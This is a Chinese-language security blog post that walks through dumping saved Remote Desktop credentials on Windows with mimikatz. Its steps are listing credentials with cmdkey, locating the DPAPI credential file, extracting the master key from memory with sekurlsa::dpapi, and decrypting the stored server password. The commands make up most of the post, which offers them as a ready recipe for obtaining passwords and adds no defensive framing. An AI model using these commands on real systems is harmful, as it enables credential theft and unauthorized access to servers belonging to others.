最新文章:

首页 信息安全

利用mimikat查看服务器密码

发布时间:2017年12月11日 评论数:抢沙发 阅读数:5378

    0x01凭据管理器中查看Windows凭据:TERMSRV/1xx.xxx.xxx.xx2

    可通过命令行获取,执行: cmdkey /list

    注意:该命令务必在Session会话下执行,system下执行无结果。

    0x02凭据存储在用户目录下:

    C:Users<username>AppDataLocalMicrosoftCredentials*

    图中名为"FF359429D6F19C64BA7D3E282558EEB5"的文件即为目标凭据:TERMSRV/1xx.xxx.xxx.xx2的存储文件

    0x03执行:

    mimikatz "dpapi::cred /in:C:Usersxx AppDataLocalMicrosoftCredentialsFF 359429D6F19C64BA7D3E282558EEB5"

    pbData是凭据的加密数据,guidMasterKey是凭据的GUID: {d91b091a-ef25-4424-aa45-a2a56b47a699}

    0x04执行:

    mimikatz privilege::debug sekurlsa::dpapi

    根据目标凭据GUID: {d91b091a-ef25-4424-aa45-a2a56b47a699}找到其关联的MasterKey,这个MasterKey就是加密凭据的密钥,即解密pbData所必须的东西。

    0x05 拿到了MasterKey,服务器密码便唾手可得。执行解密命令:

    mimikatz "dpapi::cred /in:C:Usersxx AppDataLocalMicrosoftCredentialsFF 359429D6F19C64BA7D3E282558EEB5 /masterkey:28d1f3252c019f9cxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxx16dcec8e5dbf5cd0"

    解密出来的CredentialBlob即为凭据TERMSRV/1xx.xxx.xxx.xx2的服务器密码。

    参考:

    http://www.freebuf.com/articles/network/146460.html

二维码加载中...
本文作者:Mr.linus      文章标题: 利用mimikat查看服务器密码
本文地址:http://www.90qj.com/456.html  本文已经被百度收录,点击查看详情
版权声明:若无注明,本文皆为“挨踢 Blog”原创,转载请保留文章出处。
挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论